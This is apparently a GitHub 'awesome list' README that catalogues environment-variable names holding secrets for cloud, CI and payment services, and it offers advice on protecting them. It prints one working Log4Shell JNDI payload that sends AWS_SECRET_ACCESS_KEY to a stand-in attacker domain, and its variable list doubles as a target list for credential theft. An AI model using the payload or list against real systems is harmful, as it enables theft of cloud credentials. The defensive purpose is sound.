Awesome list of secrets in environment variables
📝 Description
List of secrets, passwords, API keys, tokens stored inside a system environment variables.
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.
Many developer documentations recommends storing secrets inside an environment variable, but is it the best way to keep secrets?
The attacker can read values inside system environment variable by using exploits:
-
CVE-2021-44228 JNDI log4j (JAVA) (Read more...)
${jndi:ldap://somesitehackerofhell.com/z?leak=${env:AWS_SECRET_ACCESS_KEY:-NO_EXISTS}}
Get AWS_SECRET_ACCESS_KEY or return NO_EXISTS
-
CVE-XXXX-XXXX Web browser attack (Writeup/POC coming soon to my Github - Follow me on Github and Twitter
😉 -
and much more...
Because of that I created, a list of secrets in environment variables to help secure software.
Some of practices to avoid leak of secrets stored in environment variables is to:
- Block/notify on WAF when the request includes system environment variables
- Store in system environment variable path to a config file, instead of clean value
- Encrypt values inside environment variable
- Use different way to store secrets
🤓
You can check your system environment variables:
- Windows execute in PowerShell:
dir env:
- Linux/MacOS execute in terminal:
printenv
orenv
Awesome list of secrets in environment variables
A
AWS
- AWS_ACCESS_KEY_ID
- AWS_SECRET_ACCESS_KEY
- AMAZON_AWS_ACCESS_KEY_ID
- AMAZON_AWS_SECRET_ACCESS_KEY
source: https://docs.aws.amazon.com/sdkref/latest/guide/setting-global-aws_secret_access_key.html
Azure
- AZURE_CLIENT_ID
- AZURE_CLIENT_SECRET
- AZURE_USERNAME
- AZURE_PASSWORD
- MSI_ENDPOINT
- MSI_SECRET
source: https://docs.microsoft.com/en-us/dotnet/api/azure.identity.environmentcredential?view=azure-dotnet
source: https://techcommunity.microsoft.com/t5/azure-developer-community-blog/understanding-azure-msi-managed-service-identity-tokens-caching/ba-p/337406
B
Binance
- binance_api
- binance_secret
source: https://algotrading101.com/learn/binance-python-api-guide/
Bittrex
- BITTREX_API_KEY
- BITTREX_API_SECRET
source: https://github.com/TeamWertarbyte/crypto-trading-bot/blob/development/README.md
C
CircleCI
- CIRCLE_TOKEN
source: https://circleci.com/docs/2.0/api-developers-guide/
D
Digitalocean
- DIGITALOCEAN_ACCESS_TOKEN
source: https://github.com/digitalocean/doctl#authenticating-with-digitalocean
Dockerhub
- DOCKERHUB_PASSWORD
source: https://circleci.com/docs/2.0/env-vars/
E
F
Fastlane products
- ITC_PASSWORD
source: https://github.com/phatblat/fastlane-variables
- FACEBOOK_APP_ID
- FACEBOOK_APP_SECRET
- FACEBOOK_ACCESS_TOKEN
G
Github
- GH_TOKEN
- GITHUB_TOKEN
- GH_ENTERPRISE_TOKEN
- GITHUB_ENTERPRISE_TOKEN
source: https://cli.github.com/manual/gh_help_environment
Google Cloud
- GOOGLE_APPLICATION_CREDENTIALS
- GOOGLE_API_KEY
source: https://cloud.google.com/docs/authentication/getting-started#windows
Gitlab
- CI_DEPLOY_USER
- CI_DEPLOY_PASSWORD
- GITLAB_USER_LOGIN
- CI_JOB_JWT
- CI_JOB_JWT_V2
- CI_JOB_TOKEN
source: https://docs.gitlab.com/ee/ci/variables/predefined_variables.html
H
I
J
K
L
M
Mailgun
- MAILGUN_API_KEY
source: https://www.pulumi.com/registry/packages/mailgun/installation-configuration/
MongoDB
- MCLI_PRIVATE_API_KEY
- MCLI_PUBLIC_API_KEY
https://docs.mongodb.com/mongocli/stable/configure/environment-variables/
N
NPM
- NPM_TOKEN
source: https://docs.npmjs.com/using-private-packages-in-a-ci-cd-workflow
O
OpenStack command-line client
- OS_PASSWORD
P
Percy.io
- PERCY_TOKEN
source: https://docs.percy.io/docs/environment-variables
Q
R
S
Sentry
- SENTRY_AUTH_TOKEN
source: https://docs.sentry.io/product/cli/configuration/
Slack
- SLACK_TOKEN
source: https://slack.dev/node-slack-sdk/getting-started
Square
- square_access_token
- square_oauth_secret
source: https://www.npmjs.com/package/square/v/12.0.0?activeTab=readme
Stripe
- STRIPE_API_KEY
- STRIPE_DEVICE_NAME
source: https://stripe.com/docs/cli/api_keys
T
Twilio
- TWILIO_ACCOUNT_SID
- TWILIO_AUTH_TOKEN
Source: https://www.twilio.com/blog/2017/01/how-to-set-environment-variables.html
- CONSUMER_KEY
- CONSUMER_SECRET
source: https://developer.twitter.com/en/docs/authentication/guides/authentication-best-practices
Travis Ci
- TRAVIS_SUDO
- TRAVIS_OS_NAME
- TRAVIS_SECURE_ENV_VARS
source: https://docs.travis-ci.com/user/environment-variables
U
V
Vault HashiCorp
- VAULT_TOKEN
- VAULT_CLIENT_KEY
source: https://www.vaultproject.io/docs/commands
Vultr
- TOKEN
- VULTR_ACCESS
- VULTR_SECRET
source: https://www.vultr.com/docs/deploying-javascript-unikernels-to-vultr-with-ops
W
X
Y
Z
Get a RAW list:
The repository includes the raw list:
It is auto-generated from README.md by GitHub action.
😎 Contributing
If you would like to add more secrets:
Please read and follow our Contributing guide
Thanks!
💻 Useful links
- Stackoverflow - Is it secure to store passwords as environment variables (rather than as plain text) in config files?
- Google - Best practices for securely using API keys
- An Introduction to Environment Variables and How to Use Them
- Why you shouldn't use ENV variables for secret data
- The Triumph and Tragedy of .env Files
🤝 Show your support
✔️ Disclaimer
This project can only be used for educational purposes. Using this software against target systems without prior permission is illegal, and any damages from misuse of this software will not be the responsibility of the author.